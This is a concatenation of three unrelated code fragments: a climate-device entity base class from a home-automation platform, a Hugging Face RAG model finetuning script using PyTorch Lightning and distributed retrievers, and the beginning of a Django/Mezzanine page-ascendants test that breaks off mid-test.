    for device in devices:
        device.set_operation_mode(mode)

        if device.should_poll:
            device.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_OPERATION_MODE, operation_set_service,
descriptions.get(SERVICE_SET_OPERATION_MODE),
schema=SET_OPERATION_MODE_SCHEMA)
def swing_set_service(service):
    """Handle the set_swing_mode service call for the target devices."""
    devices = component.extract_from_service(service)
    mode = service.data.get(ATTR_SWING_MODE)

    if mode is None:
        _LOGGER.error(
            "Received call to %s without attribute %s",
            SERVICE_SET_SWING_MODE, ATTR_SWING_MODE)
        return

    for device in devices:
        device.set_swing_mode(mode)

        if device.should_poll:
            device.update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_SWING_MODE, swing_set_service,
descriptions.get(SERVICE_SET_SWING_MODE),
schema=SET_SWING_MODE_SCHEMA)
return True
class ClimateDevice(Entity):
    """Representation of a climate device.

    Platforms subclass this and override the properties / setters that
    their hardware supports; unsupported features default to ``None`` so
    they are simply omitted from the state attributes.
    """

    # pylint: disable=too-many-public-methods,no-self-use
    @property
    def state(self):
        """Return the current state."""
        if self.current_operation:
            return self.current_operation
        else:
            return STATE_UNKNOWN

    @property
    def state_attributes(self):
        """Return the optional state attributes.

        Every temperature is converted into the user's display unit via
        ``_convert_for_display``. Optional capabilities (humidity, fan,
        operation, swing, away mode, aux heat) are only included when the
        platform reports a non-None value for them.
        """
        data = {
            ATTR_CURRENT_TEMPERATURE:
                self._convert_for_display(self.current_temperature),
            ATTR_MIN_TEMP: self._convert_for_display(self.min_temp),
            ATTR_MAX_TEMP: self._convert_for_display(self.max_temp),
            ATTR_TEMPERATURE:
                self._convert_for_display(self.target_temperature),
        }

        target_temp_high = self.target_temperature_high
        if target_temp_high is not None:
            # Reuse the value fetched above instead of reading the
            # property a second time.
            data[ATTR_TARGET_TEMP_HIGH] = self._convert_for_display(
                target_temp_high)
            data[ATTR_TARGET_TEMP_LOW] = self._convert_for_display(
                self.target_temperature_low)

        humidity = self.target_humidity
        if humidity is not None:
            data[ATTR_HUMIDITY] = humidity
            data[ATTR_CURRENT_HUMIDITY] = self.current_humidity
            data[ATTR_MIN_HUMIDITY] = self.min_humidity
            data[ATTR_MAX_HUMIDITY] = self.max_humidity

        fan_mode = self.current_fan_mode
        if fan_mode is not None:
            data[ATTR_FAN_MODE] = fan_mode
            if self.fan_list:
                data[ATTR_FAN_LIST] = self.fan_list

        operation_mode = self.current_operation
        if operation_mode is not None:
            data[ATTR_OPERATION_MODE] = operation_mode
            if self.operation_list:
                data[ATTR_OPERATION_LIST] = self.operation_list

        swing_mode = self.current_swing_mode
        if swing_mode is not None:
            data[ATTR_SWING_MODE] = swing_mode
            if self.swing_list:
                data[ATTR_SWING_LIST] = self.swing_list

        is_away = self.is_away_mode_on
        if is_away is not None:
            data[ATTR_AWAY_MODE] = STATE_ON if is_away else STATE_OFF

        is_aux_heat = self.is_aux_heat_on
        if is_aux_heat is not None:
            data[ATTR_AUX_HEAT] = STATE_ON if is_aux_heat else STATE_OFF

        return data

    @property
    def unit_of_measurement(self):
        """The unit of measurement to display."""
        return self.hass.config.units.temperature_unit

    @property
    def temperature_unit(self):
        """The unit of measurement used by the platform."""
        raise NotImplementedError

    @property
    def current_humidity(self):
        """Return the current humidity."""
        return None

    @property
    def target_humidity(self):
        """Return the humidity we try to reach."""
        return None

    @property
    def current_operation(self):
        """Return current operation ie. heat, cool, idle."""
        return None

    @property
    def operation_list(self):
        """List of available operation modes."""
        return None

    @property
    def current_temperature(self):
        """Return the current temperature."""
        return None

    @property
    def target_temperature(self):
        """Return the temperature we try to reach."""
        return None

    @property
    def target_temperature_high(self):
        """Return the highbound target temperature we try to reach."""
        return None

    @property
    def target_temperature_low(self):
        """Return the lowbound target temperature we try to reach."""
        return None

    @property
    def is_away_mode_on(self):
        """Return true if away mode is on."""
        return None

    @property
    def is_aux_heat_on(self):
        """Return true if aux heater."""
        return None

    @property
    def current_fan_mode(self):
        """Return the fan setting."""
        return None

    @property
    def fan_list(self):
        """List of available fan modes."""
        return None

    @property
    def current_swing_mode(self):
        """Return the swing setting."""
        return None

    @property
    def swing_list(self):
        """List of available swing modes."""
        return None

    def set_temperature(self, **kwargs):
        """Set new target temperature."""
        raise NotImplementedError()

    def set_humidity(self, humidity):
        """Set new target humidity."""
        raise NotImplementedError()

    def set_fan_mode(self, fan):
        """Set new target fan mode."""
        raise NotImplementedError()

    def set_operation_mode(self, operation_mode):
        """Set new target operation mode."""
        raise NotImplementedError()

    def set_swing_mode(self, swing_mode):
        """Set new target swing operation."""
        raise NotImplementedError()

    def turn_away_mode_on(self):
        """Turn away mode on."""
        raise NotImplementedError()

    def turn_away_mode_off(self):
        """Turn away mode off."""
        raise NotImplementedError()

    def turn_aux_heat_on(self):
        """Turn auxiliary heater on."""
        raise NotImplementedError()

    def turn_aux_heat_off(self):
        """Turn auxiliary heater off."""
        raise NotImplementedError()

    @property
    def min_temp(self):
        """Return the minimum temperature."""
        return convert_temperature(7, TEMP_CELSIUS, self.temperature_unit)

    @property
    def max_temp(self):
        """Return the maximum temperature."""
        return convert_temperature(35, TEMP_CELSIUS, self.temperature_unit)

    @property
    def min_humidity(self):
        """Return the minimum humidity."""
        return 30

    @property
    def max_humidity(self):
        """Return the maximum humidity."""
        return 99

    def _convert_for_display(self, temp):
        """Convert temperature into preferred units for display purposes."""
        if temp is None or not isinstance(temp, Number):
            return temp

        value = convert_temperature(temp, self.temperature_unit,
                                    self.unit_of_measurement)

        # BUG FIX: compare the unit strings with ``==``, not ``is`` --
        # identity comparison on strings only worked by interning accident.
        if self.unit_of_measurement == TEMP_CELSIUS:
            decimal_count = 1
        else:
            # Users of fahrenheit generally expect integer units.
            decimal_count = 0

        return round(value, decimal_count)
| |
"""Finetuning script for RAG models. Adapted from examples.seq2seq.finetune.py"""
import argparse
import logging
import os
import sys
import time
from collections import defaultdict
from pathlib import Path
from typing import Any, Dict, List, Tuple
import numpy as np
import pytorch_lightning as pl
import torch
import torch.distributed as dist
from pytorch_lightning.accelerators.ddp_accelerator import DDPAccelerator
from pytorch_lightning.cluster_environments import TorchElasticEnvironment
from torch.utils.data import DataLoader
from transformers import (
AutoConfig,
AutoTokenizer,
BartForConditionalGeneration,
BatchEncoding,
RagConfig,
RagSequenceForGeneration,
RagTokenForGeneration,
RagTokenizer,
T5ForConditionalGeneration,
)
from transformers import logging as transformers_logging
from transformers.integrations import is_ray_available
if is_ray_available():
import ray
from distributed_ray_retriever import RagRayDistributedRetriever, RayRetriever
from callbacks_rag import (  # noqa: E402 # isort:skip
get_checkpoint_callback,
get_early_stopping_callback,
Seq2SeqLoggingCallback,
)
from distributed_pytorch_retriever import RagPyTorchDistributedRetriever # noqa: E402 # isort:skip
from utils_rag import ( # noqa: E402 # isort:skip
calculate_exact_match,
flatten_list,
get_git_info,
is_rag_model,
lmap,
pickle_save,
save_git_info,
save_json,
set_extra_model_params,
Seq2SeqDataset,
)
# need the parent dir module
sys.path.insert(2, str(Path(__file__).resolve().parents[1]))
from lightning_base import BaseTransformer, add_generic_args, generic_train # noqa
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
transformers_logging.set_verbosity_info()
class AttrDict(dict):
    """Dictionary whose items are also reachable as attributes.

    Used so that hyperparameters restored from a Lightning checkpoint
    (a plain dict) behave like an argparse ``Namespace``.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Alias the attribute namespace to the mapping itself, keeping
        # ``obj.key`` and ``obj["key"]`` permanently in sync.
        self.__dict__ = self
# In PTL >v1.0, `init_ddp_connection` method in the `LightningModule`
# is no longer used, and is moved into DDPAccelerator instead.
# We override DDPAccelerator to add our custom logic for initializing the
# retriever.
# https://github.com/PyTorchLightning/pytorch-lightning/blob/master/tests/backends/test_accelerator_connector.py
class CustomAccel(DDPAccelerator):
    """DDP accelerator that also brings up the distributed RAG retriever
    right after the DDP process group is initialized."""

    def __init__(self, trainer=None, **kwargs):
        # Trainer is set later.
        super().__init__(trainer, **kwargs)

    def init_ddp_connection(self, global_rank: int, world_size: int, is_slurm_managing_tasks: bool = True):
        """Initialize the DDP connection, then the retriever.

        After the standard DDP setup, the retriever is initialized once:
        on every rank for the PyTorch retriever (it communicates over the
        same distributed port), but only on global rank 0 for Ray.
        """
        logger.info("Custom init_ddp_connection.")
        module = self.trainer.model
        if self.cluster_environment is None:
            self.cluster_environment = TorchElasticEnvironment()
        # Reuse the port chosen on the command line for the DDP master.
        self.distributed_port = module.hparams.distributed_port
        os.environ["MASTER_PORT"] = str(self.distributed_port)
        super().init_ddp_connection(global_rank, world_size, is_slurm_managing_tasks)
        if module.is_rag_model:
            if module.distributed_retriever == "pytorch":
                module.model.rag.retriever.init_retrieval(self.distributed_port)
            elif module.distributed_retriever == "ray" and global_rank == 0:
                # For the Ray retriever, only initialize it once when global
                # rank is 0.
                module.model.rag.retriever.init_retrieval()
class GenerativeQAModule(BaseTransformer):
    """Lightning module that finetunes a RAG model (or a plain BART/T5
    seq2seq generator) for generative question answering, reporting
    exact-match as the validation metric."""

    mode = "generative_qa"
    loss_names = ["loss"]
    metric_names = ["em"]
    val_metric = "em"

    def __init__(self, hparams, **kwargs):
        """Build config, retriever (RAG only), model and tokenizer from hparams."""
        # when loading from a pytorch lightning checkpoint, hparams are passed as dict
        if isinstance(hparams, dict):
            hparams = AttrDict(hparams)
        if hparams.model_type == "rag_sequence":
            self.model_class = RagSequenceForGeneration
        elif hparams.model_type == "rag_token":
            self.model_class = RagTokenForGeneration
        elif hparams.model_type == "bart":
            self.model_class = BartForConditionalGeneration
        else:
            self.model_class = T5ForConditionalGeneration
        self.is_rag_model = is_rag_model(hparams.model_type)

        config_class = RagConfig if self.is_rag_model else AutoConfig
        config = config_class.from_pretrained(hparams.model_name_or_path)

        # set retriever parameters
        config.index_name = hparams.index_name or config.index_name
        config.passages_path = hparams.passages_path or config.passages_path
        config.index_path = hparams.index_path or config.index_path
        config.use_dummy_dataset = hparams.use_dummy_dataset

        # set extra_model_params for generator configs and load_model
        extra_model_params = ("encoder_layerdrop", "decoder_layerdrop", "attention_dropout", "dropout")
        if self.is_rag_model:
            if hparams.prefix is not None:
                config.generator.prefix = hparams.prefix
            config.label_smoothing = hparams.label_smoothing
            hparams, config.generator = set_extra_model_params(extra_model_params, hparams, config.generator)
            # NOTE(review): if distributed_retriever is neither "pytorch"
            # nor "ray", `retriever` below is unbound (NameError). argparse
            # restricts the choices, but checkpoint-restored hparams are
            # not validated -- confirm upstream.
            if hparams.distributed_retriever == "pytorch":
                retriever = RagPyTorchDistributedRetriever.from_pretrained(hparams.model_name_or_path, config=config)
            elif hparams.distributed_retriever == "ray":
                # The Ray retriever needs the handles to the retriever actors.
                retriever = RagRayDistributedRetriever.from_pretrained(
                    hparams.model_name_or_path, hparams.actor_handles, config=config
                )
            model = self.model_class.from_pretrained(hparams.model_name_or_path, config=config, retriever=retriever)
            prefix = config.question_encoder.prefix
        else:
            if hparams.prefix is not None:
                config.prefix = hparams.prefix
            hparams, config = set_extra_model_params(extra_model_params, hparams, config)
            model = self.model_class.from_pretrained(hparams.model_name_or_path, config=config)
            prefix = config.prefix

        tokenizer = (
            RagTokenizer.from_pretrained(hparams.model_name_or_path)
            if self.is_rag_model
            else AutoTokenizer.from_pretrained(hparams.model_name_or_path)
        )

        super().__init__(hparams, config=config, tokenizer=tokenizer, model=model)

        save_git_info(self.hparams.output_dir)
        self.output_dir = Path(self.hparams.output_dir)
        self.metrics_save_path = Path(self.output_dir) / "metrics.json"
        self.hparams_save_path = Path(self.output_dir) / "hparams.pkl"
        pickle_save(self.hparams, self.hparams_save_path)
        self.step_count = 0
        self.metrics = defaultdict(list)

        self.dataset_kwargs: dict = dict(
            data_dir=self.hparams.data_dir,
            max_source_length=self.hparams.max_source_length,
            prefix=prefix or "",
        )
        n_observations_per_split = {
            "train": self.hparams.n_train,
            "val": self.hparams.n_val,
            "test": self.hparams.n_test,
        }
        # A negative count means "use the whole split".
        self.n_obs = {k: v if v >= 0 else None for k, v in n_observations_per_split.items()}

        self.target_lens = {
            "train": self.hparams.max_target_length,
            "val": self.hparams.val_max_target_length,
            "test": self.hparams.test_max_target_length,
        }
        assert self.target_lens["train"] <= self.target_lens["val"], f"target_lens: {self.target_lens}"
        assert self.target_lens["train"] <= self.target_lens["test"], f"target_lens: {self.target_lens}"

        self.hparams.git_sha = get_git_info()["repo_sha"]
        self.num_workers = hparams.num_workers
        self.distributed_port = self.hparams.distributed_port

        # For single GPU training, init_ddp_connection is not called.
        # So we need to initialize the retrievers here.
        if hparams.gpus <= 1:
            if hparams.distributed_retriever == "ray":
                self.model.retriever.init_retrieval()
            elif hparams.distributed_retriever == "pytorch":
                self.model.retriever.init_retrieval(self.distributed_port)

        self.distributed_retriever = hparams.distributed_retriever

    def forward(self, input_ids, **kwargs):
        """Delegate the forward pass to the wrapped model."""
        return self.model(input_ids, **kwargs)

    def ids_to_clean_text(self, generated_ids: List[int]):
        """Decode token ids to text, stripping special tokens and whitespace."""
        gen_text = self.tokenizer.batch_decode(
            generated_ids, skip_special_tokens=True, clean_up_tokenization_spaces=True
        )
        return lmap(str.strip, gen_text)

    def _step(self, batch: dict) -> Tuple:
        """Run one forward pass on a batch and return the loss as a 1-tuple.

        Builds decoder inputs/labels per model family: T5 shifts targets
        right, BART uses the targets minus the final token, and RAG derives
        them from its underlying generator with ``reduce_loss=True``.
        """
        source_ids, source_mask, target_ids = batch["input_ids"], batch["attention_mask"], batch["decoder_input_ids"]

        rag_kwargs = {}
        if isinstance(self.model, T5ForConditionalGeneration):
            decoder_input_ids = self.model._shift_right(target_ids)
            lm_labels = target_ids
        elif isinstance(self.model, BartForConditionalGeneration):
            decoder_input_ids = target_ids[:, :-1].contiguous()
            lm_labels = target_ids[:, 1:].clone()
        else:
            assert self.is_rag_model
            generator = self.model.rag.generator
            if isinstance(generator, T5ForConditionalGeneration):
                decoder_start_token_id = generator.config.decoder_start_token_id
                decoder_input_ids = (
                    torch.cat(
                        [torch.Tensor([[decoder_start_token_id]] * target_ids.shape[0]).to(target_ids), target_ids],
                        dim=1,
                    )
                    if target_ids.shape[0] < self.target_lens["train"]
                    else generator._shift_right(target_ids)
                )
            elif isinstance(generator, BartForConditionalGeneration):
                decoder_input_ids = target_ids
            lm_labels = decoder_input_ids
            rag_kwargs["reduce_loss"] = True

        assert decoder_input_ids is not None

        outputs = self(
            source_ids,
            attention_mask=source_mask,
            decoder_input_ids=decoder_input_ids,
            use_cache=False,
            labels=lm_labels,
            **rag_kwargs,
        )
        loss = outputs["loss"]
        return (loss,)

    @property
    def pad(self) -> int:
        # Intentionally unimplemented; subclasses/datasets handle padding.
        raise NotImplementedError("pad not implemented")

    def training_step(self, batch, batch_idx) -> Dict:
        """Compute the training loss plus a tokens-per-batch log entry."""
        loss_tensors = self._step(batch)

        logs = {name: loss for name, loss in zip(self.loss_names, loss_tensors)}
        # tokens per batch
        tgt_pad_token_id = (
            self.tokenizer.generator.pad_token_id
            if isinstance(self.tokenizer, RagTokenizer)
            else self.tokenizer.pad_token_id
        )
        src_pad_token_id = (
            self.tokenizer.question_encoder.pad_token_id
            if isinstance(self.tokenizer, RagTokenizer)
            else self.tokenizer.pad_token_id
        )
        logs["tpb"] = (
            batch["input_ids"].ne(src_pad_token_id).sum() + batch["decoder_input_ids"].ne(tgt_pad_token_id).sum()
        )

        return {"loss": loss_tensors[0], "log": logs}

    def validation_step(self, batch, batch_idx) -> Dict:
        """Run generation + loss computation on one validation batch."""
        return self._generative_step(batch)

    def validation_epoch_end(self, outputs, prefix="val") -> Dict:
        """Aggregate per-batch outputs into epoch metrics and persist them."""
        self.step_count += 1
        losses = {k: torch.stack([x[k] for x in outputs]).mean() for k in self.loss_names}
        loss = losses["loss"]
        gen_metrics = {
            k: np.array([x[k] for x in outputs]).mean() for k in self.metric_names + ["gen_time", "gen_len"]
        }
        metrics_tensor: torch.FloatTensor = torch.tensor(gen_metrics[self.val_metric]).type_as(loss)
        gen_metrics.update({k: v.item() for k, v in losses.items()})

        # fix for https://github.com/PyTorchLightning/pytorch-lightning/issues/2424
        if dist.is_initialized():
            dist.all_reduce(metrics_tensor, op=dist.ReduceOp.SUM)
            metrics_tensor = metrics_tensor / dist.get_world_size()
            gen_metrics.update({self.val_metric: metrics_tensor.item()})

        losses.update(gen_metrics)
        metrics = {f"{prefix}_avg_{k}": x for k, x in losses.items()}
        metrics["step_count"] = self.step_count
        self.save_metrics(metrics, prefix)  # writes to self.metrics_save_path
        preds = flatten_list([x["preds"] for x in outputs])
        return {"log": metrics, "preds": preds, f"{prefix}_loss": loss, f"{prefix}_{self.val_metric}": metrics_tensor}

    def save_metrics(self, latest_metrics, type_path) -> None:
        """Append metrics for this split and rewrite metrics.json."""
        self.metrics[type_path].append(latest_metrics)
        save_json(self.metrics, self.metrics_save_path)

    def calc_generative_metrics(self, preds, target) -> Dict:
        """Score predictions against targets with exact match."""
        return calculate_exact_match(preds, target)

    def _generative_step(self, batch: dict) -> dict:
        """Generate answers for a batch and return loss + generation metrics."""
        start_time = time.time()
        batch = BatchEncoding(batch).to(device=self.model.device)
        generated_ids = self.model.generate(
            batch["input_ids"],
            attention_mask=batch["attention_mask"],
            do_deduplication=False,  # rag specific parameter
            use_cache=True,
            min_length=1,
            max_length=self.target_lens["val"],
        )
        # Per-example generation time for the whole batch.
        gen_time = (time.time() - start_time) / batch["input_ids"].shape[0]
        preds: List[str] = self.ids_to_clean_text(generated_ids)
        target: List[str] = self.ids_to_clean_text(batch["decoder_input_ids"])
        loss_tensors = self._step(batch)
        base_metrics = {name: loss for name, loss in zip(self.loss_names, loss_tensors)}
        gen_metrics: Dict = self.calc_generative_metrics(preds, target)

        summ_len = np.mean(lmap(len, generated_ids))
        base_metrics.update(gen_time=gen_time, gen_len=summ_len, preds=preds, target=target, **gen_metrics)
        return base_metrics

    def test_step(self, batch, batch_idx):
        """Test uses the same generative evaluation as validation."""
        return self._generative_step(batch)

    def test_epoch_end(self, outputs):
        """Aggregate test outputs with the validation logic, under 'test' keys."""
        return self.validation_epoch_end(outputs, prefix="test")

    def get_dataset(self, type_path) -> Seq2SeqDataset:
        """Build the Seq2SeqDataset for the given split ('train'/'val'/'test')."""
        n_obs = self.n_obs[type_path]
        max_target_length = self.target_lens[type_path]
        dataset = Seq2SeqDataset(
            self.tokenizer,
            type_path=type_path,
            n_obs=n_obs,
            max_target_length=max_target_length,
            **self.dataset_kwargs,
        )
        return dataset

    def get_dataloader(self, type_path: str, batch_size: int, shuffle: bool = False) -> DataLoader:
        """Wrap the split's dataset in a DataLoader with its collate_fn."""
        dataset = self.get_dataset(type_path)
        dataloader = DataLoader(
            dataset,
            batch_size=batch_size,
            collate_fn=dataset.collate_fn,
            shuffle=shuffle,
            num_workers=self.num_workers,
        )
        return dataloader

    def train_dataloader(self) -> DataLoader:
        """Shuffled training DataLoader."""
        dataloader = self.get_dataloader("train", batch_size=self.hparams.train_batch_size, shuffle=True)
        return dataloader

    def val_dataloader(self) -> DataLoader:
        """Validation DataLoader (no shuffling)."""
        return self.get_dataloader("val", batch_size=self.hparams.eval_batch_size)

    def test_dataloader(self) -> DataLoader:
        """Test DataLoader (no shuffling)."""
        return self.get_dataloader("test", batch_size=self.hparams.eval_batch_size)

    @pl.utilities.rank_zero_only
    def on_save_checkpoint(self, checkpoint: Dict[str, Any]) -> None:
        """On rank 0, save model+tokenizer to checkpoint{step_count}/."""
        save_path = self.output_dir.joinpath("checkpoint{}".format(self.step_count))
        self.model.config.save_step = self.step_count
        self.model.save_pretrained(save_path)
        self.tokenizer.save_pretrained(save_path)

    @staticmethod
    def add_model_specific_args(parser, root_dir):
        """Register model/data CLI arguments on top of the generic ones."""
        BaseTransformer.add_model_specific_args(parser, root_dir)
        add_generic_args(parser, root_dir)
        parser.add_argument(
            "--max_source_length",
            default=128,
            type=int,
            help="The maximum total input sequence length after tokenization. Sequences longer "
            "than this will be truncated, sequences shorter will be padded.",
        )
        parser.add_argument(
            "--max_target_length",
            default=25,
            type=int,
            help="The maximum total input sequence length after tokenization. Sequences longer "
            "than this will be truncated, sequences shorter will be padded.",
        )
        parser.add_argument(
            "--val_max_target_length",
            default=25,
            type=int,
            help="The maximum total input sequence length after tokenization. Sequences longer "
            "than this will be truncated, sequences shorter will be padded.",
        )
        parser.add_argument(
            "--test_max_target_length",
            default=25,
            type=int,
            help="The maximum total input sequence length after tokenization. Sequences longer "
            "than this will be truncated, sequences shorter will be padded.",
        )
        parser.add_argument("--logger_name", type=str, choices=["default", "wandb", "wandb_shared"], default="default")
        parser.add_argument("--n_train", type=int, default=-1, required=False, help="# examples. -1 means use all.")
        parser.add_argument("--n_val", type=int, default=-1, required=False, help="# examples. -1 means use all.")
        parser.add_argument("--n_test", type=int, default=-1, required=False, help="# examples. -1 means use all.")
        parser.add_argument("--label_smoothing", type=float, default=0.0, required=False)
        parser.add_argument(
            "--prefix",
            type=str,
            default=None,
            help="Prefix added at the beginning of each text, typically used with T5-based models.",
        )
        parser.add_argument(
            "--early_stopping_patience",
            type=int,
            default=-1,
            required=False,
            help="-1 means never early stop. early_stopping_patience is measured in validation checks, not epochs. So val_check_interval will effect it.",
        )
        parser.add_argument(
            "--distributed-port", type=int, default=-1, required=False, help="Port number for distributed training."
        )
        parser.add_argument(
            "--model_type",
            choices=["rag_sequence", "rag_token", "bart", "t5"],
            type=str,
            help="RAG model type: sequence or token, if none specified, the type is inferred from the model_name_or_path",
        )
        return parser

    @staticmethod
    def add_retriever_specific_args(parser):
        """Register retriever/index CLI arguments."""
        parser.add_argument(
            "--index_name",
            type=str,
            default=None,
            help="Name of the index to use: 'hf' for a canonical dataset from the datasets library (default), 'custom' for a local index, or 'legacy' for the orignal one)",
        )
        parser.add_argument(
            "--passages_path",
            type=str,
            default=None,
            help="Path to the dataset of passages for custom index. More info about custom indexes in the RagRetriever documentation as well as in `examples/rag/use_own_knowledge_dataset.py`",
        )
        parser.add_argument(
            "--index_path",
            type=str,
            default=None,
            help="Path to the faiss index for custom index. More info about custom indexes in the RagRetriever documentation as well as in `examples/rag/use_own_knowledge_dataset.py`",
        )
        parser.add_argument(
            "--distributed_retriever",
            choices=["ray", "pytorch"],
            type=str,
            default="pytorch",
            help="What implementation to use for distributed retriever? If "
            "pytorch is selected, the index is loaded on training "
            "worker 0, and torch.distributed is used to handle "
            "communication between training worker 0, and the other "
            "training workers. If ray is selected, the Ray library is "
            "used to create load the index on separate processes, "
            "and Ray handles the communication between the training "
            "workers and the retrieval actors.",
        )
        parser.add_argument(
            "--use_dummy_dataset",
            type=bool,
            default=False,
            help="Whether to use the dummy version of the dataset index. More info about custom indexes in the RagRetriever documentation as well as in `examples/rag/use_own_knowledge_dataset.py`",
        )
        return parser

    @staticmethod
    def add_ray_specific_args(parser):
        """Register Ray-only CLI arguments (cluster address, worker count)."""
        # Ray cluster address.
        parser.add_argument(
            "--ray-address",
            default="auto",
            type=str,
            help="The address of the Ray cluster to connect to. If not "
            "specified, Ray will attempt to automatically detect the "
            "cluster. Has no effect if pytorch is used as the distributed "
            "retriever.",
        )
        parser.add_argument(
            "--num_retrieval_workers",
            type=int,
            default=1,
            help="The number of retrieval actors to use when Ray is selected"
            "for the distributed retriever. Has no effect when "
            "distributed_retriever is set to pytorch.",
        )
        return parser
def main(args=None, model=None) -> GenerativeQAModule:
    """Parse CLI arguments (unless ``args`` is given), build the module and train.

    Args:
        args: Pre-parsed namespace; when ``None``, arguments are parsed
            from ``sys.argv``.
        model: Optional pre-built ``GenerativeQAModule`` to reuse.

    Returns:
        The (trained) ``GenerativeQAModule``.
    """
    parser = argparse.ArgumentParser()
    parser = pl.Trainer.add_argparse_args(parser)
    parser = GenerativeQAModule.add_model_specific_args(parser, os.getcwd())
    parser = GenerativeQAModule.add_retriever_specific_args(parser)
    args = args or parser.parse_args()

    Path(args.output_dir).mkdir(exist_ok=True)

    named_actors = []
    if args.distributed_retriever == "ray" and args.gpus > 1:
        if not is_ray_available():
            raise RuntimeError("Please install Ray to use the Ray distributed retriever.")
        # Connect to an existing Ray cluster.
        try:
            ray.init(address=args.ray_address)
        except (ConnectionError, ValueError):
            logger.warning(
                "Connection to Ray cluster failed. Make sure a Ray "
                "cluster is running by either using Ray's cluster "
                "launcher (`ray up`) or by manually starting Ray on "
                "each node via `ray start --head` for the head node "
                "and `ray start --address='<ip address>:6379'` for "
                "additional nodes. See "
                "https://docs.ray.io/en/master/cluster/index.html "
                "for more info."
            )
            raise

        # Create Ray actors only for rank 0.
        # BUG FIX: os.environ values are strings, so the previous
        # comparison `os.environ["LOCAL_RANK"] == 0` was always False and
        # rank 0 wrongly fell into the get-existing-actors branch.
        if ("LOCAL_RANK" not in os.environ or int(os.environ["LOCAL_RANK"]) == 0) and (
            "NODE_RANK" not in os.environ or int(os.environ["NODE_RANK"]) == 0
        ):
            remote_cls = ray.remote(RayRetriever)
            named_actors = [
                remote_cls.options(name="retrieval_worker_{}".format(i)).remote()
                for i in range(args.num_retrieval_workers)
            ]
        else:
            # Non-zero ranks look up the actors created by rank 0 by name.
            logger.info(
                "Getting named actors for NODE_RANK {}, LOCAL_RANK {}".format(
                    os.environ["NODE_RANK"], os.environ["LOCAL_RANK"]
                )
            )
            named_actors = [ray.get_actor("retrieval_worker_{}".format(i)) for i in range(args.num_retrieval_workers)]
    args.actor_handles = named_actors
    assert args.actor_handles == named_actors

    if model is None:
        model: GenerativeQAModule = GenerativeQAModule(args)

    dataset = Path(args.data_dir).name
    if (
        args.logger_name == "default"
        or args.fast_dev_run
        or str(args.output_dir).startswith("/tmp")
        or str(args.output_dir).startswith("/var")
    ):
        training_logger = True  # don't pollute wandb logs unnecessarily
    elif args.logger_name == "wandb":
        from pytorch_lightning.loggers import WandbLogger

        project = os.environ.get("WANDB_PROJECT", dataset)
        training_logger = WandbLogger(name=model.output_dir.name, project=project)
    elif args.logger_name == "wandb_shared":
        from pytorch_lightning.loggers import WandbLogger

        training_logger = WandbLogger(name=model.output_dir.name, project=f"hf_{dataset}")

    es_callback = (
        get_early_stopping_callback(model.val_metric, args.early_stopping_patience)
        if args.early_stopping_patience >= 0
        else False
    )

    trainer: pl.Trainer = generic_train(
        model,
        args,
        logging_callback=Seq2SeqLoggingCallback(),
        checkpoint_callback=get_checkpoint_callback(args.output_dir, model.val_metric),
        early_stopping_callback=es_callback,
        logger=training_logger,
        accelerator=CustomAccel() if args.gpus > 1 else None,
        profiler=pl.profiler.AdvancedProfiler() if args.profile else None,
    )

    pickle_save(model.hparams, model.output_dir / "hparams.pkl")
    if not args.do_predict:
        return model

    # test() without a model tests using the best checkpoint automatically
    trainer.test()
    return model
if __name__ == "__main__":
    # Script entry point: assemble the full argument parser (trainer,
    # model, retriever and Ray options) before delegating to main().
    parser = argparse.ArgumentParser()
    parser = pl.Trainer.add_argparse_args(parser)
    parser = GenerativeQAModule.add_model_specific_args(parser, os.getcwd())
    parser = GenerativeQAModule.add_retriever_specific_args(parser)
    parser = GenerativeQAModule.add_ray_specific_args(parser)

    # Pytorch Lightning Profiler
    parser.add_argument(
        "--profile",
        action="store_true",
        help="If True, use pytorch_lightning.profiler.AdvancedProfiler to profile the Trainer.",
    )

    args = parser.parse_args()

    main(args)
| |
from __future__ import unicode_literals
from future.builtins import str
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from django.db import connection
from django.utils.unittest import skipUnless
from django.shortcuts import resolve_url
from django.template import Context, Template
from django.test.utils import override_settings
from django.utils.http import urlquote_plus
from django.utils.six.moves.urllib.parse import urlparse
from django.utils.translation import get_language
from mezzanine.conf import settings
from mezzanine.core.models import CONTENT_STATUS_PUBLISHED
from mezzanine.core.request import current_request
from mezzanine.pages.models import Page, RichTextPage
from mezzanine.pages.admin import PageAdminForm
from mezzanine.urls import PAGES_SLUG
from mezzanine.utils.tests import TestCase
User = get_user_model()
class PagesTests(TestCase):
@staticmethod
def reset_queries(connection):
    """Empty the query log on the given database connection.

    Django 1.8+ exposes the log as ``connection.queries_log`` (a deque);
    on older versions the plain ``connection.queries`` list is replaced.
    """
    log = getattr(connection, "queries_log", None)
    if log is not None:
        log.clear()
    else:
        connection.queries = []
def test_page_ascendants(self):
    """
    Test the methods for looking up ascendants efficiently
    behave as expected.
    """
    # Create related pages.
    primary, created = RichTextPage.objects.get_or_create(title="Primary")
    secondary, created = primary.children.get_or_create(title="Secondary")
    tertiary, created = secondary.children.get_or_create(title="Tertiary")

    # Force a site ID to avoid the site query when measuring queries.
    setattr(current_request(), "site_id", settings.SITE_ID)

    # Test that get_ascendants() returns the right thing.
    page = Page.objects.get(id=tertiary.id)
    ascendants = page.get_ascendants()
    self.assertEqual(ascendants[0].id, secondary.id)
    self.assertEqual(ascendants[1].id, primary.id)

    # Test ascendants are returned in order for slug, using
    # a single DB query.
    self.reset_queries(connection)
    pages_for_slug = Page.objects.with_ascendants_for_slug(tertiary.slug)
    self.assertEqual(len(connection.queries), 1)
    self.assertEqual(pages_for_slug[0].id, tertiary.id)
    self.assertEqual(pages_for_slug[1].id, secondary.id)
    self.assertEqual(pages_for_slug[2].id, primary.id)

    # Test page.get_ascendants uses the cached attribute,
    # without any more queries.
    self.reset_queries(connection)
    ascendants = pages_for_slug[0].get_ascendants()
    self.assertEqual(len(connection.queries), 0)
    self.assertEqual(ascendants[0].id, secondary.id)
    self.assertEqual(ascendants[1].id, primary.id)

    # Use a custom slug in the page path, and test that
    # Page.objects.with_ascendants_for_slug fails, but
    # correctly falls back to recursive queries.
    secondary.slug += "custom"
    secondary.save()
    pages_for_slug = Page.objects.with_ascendants_for_slug(tertiary.slug)
    # The bulk lookup could not resolve ascendants, so the cache is empty.
